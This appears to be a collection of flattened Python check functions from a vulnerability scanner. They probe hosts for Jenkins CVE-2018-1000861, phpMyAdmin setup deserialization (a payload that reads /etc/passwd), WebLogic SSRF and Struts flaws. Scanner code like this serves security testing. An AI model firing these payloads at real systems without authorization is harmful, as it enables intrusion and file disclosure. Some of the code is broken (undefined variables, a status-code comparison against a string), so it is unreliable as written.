def check(ip, ports, apps): result = [] probe = get_list(ip, ports) for i in probe: out = get_title(i) if out: result.append(out) if result: return result
def check(ip, ports, apps): try: probe = get_list(ip, ports) for url in probe: result = put(url) except Exception as e: pass if result: return result
def check(url, ip, ports, apps): result = [] probe = get_list(url, ports) for i in probe: if re.search(r':\d+', i): out = get_title(i) if out: result.append(out) if result: return result
def check(ip, ports, apps): try: payload = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile" probe = get_list(ip, ports) for url in probe: r = requests.get(url + payload, timeout=5, headers=HEADERS) if 'java.lang.NullPointerException' in r.text: return "CVE-2018-1000861 Jenkins_unauth2rce" except Exception as e: print(e)
def check(ip, ports, apps): try: probe = get_list(ip, ports) for url in probe: r = requests.get(url, timeout=3, headers=HEADERS) if 'Jenkins' in r.text: result = jenkins(url) except Exception as e: pass if result: return result
def check(ip, ports, apps): try: payload = "/scripts/setup.php" data = 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}' probe = get_list(ip, ports) for url in probe: r = requests.post(url + payload, data=data, timeout=5, headers=get_ua(), verify=False) if r.status_code == '200' and 'root' in r.text: return url + " Phpmyadmin Setup RCE" except Exception as e: pass
def check(ip, ports, apps): try: probe = get_list(ip, ports) for url in probe: payload = '/uddiexplorer/SearchPublicRegistries.jsp' r = requests.get(url + payload, timeout=3, headers=get_ua()) if 'UDDI Explorer' in r.text: result = weblogic_ssrf(url) except Exception as e: pass if result: return result
def check(url, ip, ports, apps): result = [] try: probe = get_list(url, ports) for i in probe: if re.search(r':\d+', i): out = get_info(i) if out: result.append(out) if result: return result except Exception: pass
def check(url, ip, ports, apps): output = [] probe = get_list(url, ports) for i in probe: output.extend(struts(i).run()) return output
def check(ip, ports, apps): result = [] probe = get_list(ip, ports) for i in probe: result.append(run(i)) return result